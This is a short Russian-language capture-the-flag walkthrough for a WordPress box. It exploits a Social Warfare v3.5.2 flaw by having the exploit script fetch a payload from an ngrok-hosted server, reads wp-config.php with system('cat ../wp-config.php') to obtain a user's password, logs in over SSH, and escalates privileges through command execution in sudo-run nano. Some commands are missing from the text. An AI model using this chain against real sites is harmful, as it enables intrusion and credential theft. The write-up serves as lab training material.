Ответы на вопросы
Будет ли видео на канале? -
Нет, по 2 причинам:
1) Я могу запалить свой IP или другую информацию
2) квесты, условно говоря, являются "премиальными" тасками
Но на твоём канале уже есть прохождение таска "Подземелье" -Тогда я ещё не знал что таски являются "премиальными", + вроде ничего не запалил серьёзного, поэтому и удалять не стал.
Решение таска
После попадания на сайт нам нужно заглянуть в код элемента.
Там мы находим комментарий который нам намекает на уязвимый компонент.
Я сначала обнаружил ссылки связаные с WordPress и начал искать изъяны в нём
Находим информацию в интернете по запросу "
Warfare v3.5.2 exploit" и находимgithub с эксплойтом.
Теперь самое неприятное, это работа с ngrok. Запускаем на своей машине ngrok и Python сервер.
Код:
python3 http.server 8000
Теперь в ключах программы нужно указать наш ngrok адрес и путь к срипту который содержит следующий сценарий.
Код:
python2 script.py --target URL --payload-uri NGROK-LINK/payload.txt
Важно запускать на версии python2, иначе скрипт не запуститься!
В payload.txt пишем:
Если при выводе в терминале где у вас запущен python сервер получили ответ, Бинго!
В файлах конфигурации сервера, а именно в файле wp-config.php мы находим пароль от пользователя Kiddie.
Код:
system('cat ../wp-config.php')
Подключаемся по ssh, ngrok и сервер можно отключить, чтобы не напрягать наш компьютер и себя лишними окнами.
Пишем команду
и смотрим что нам доступно... Мы можем открывать txt файлы от лица суперпользователя в директории /tmp с помощью nano.
Как мы знаем (а кто не знает сейчас узнает), мы можем исполнять команды в nano.
Создаём текстовый файл например "
1.txt" и открываем следующим образом.
В нём ничего писать не надо, нажимаем комбинацию
Ctrl+T, и в поле ввода вводим
, если результат есть, то поздравляю, таск пройден, собираем ключ воедино и завершаем!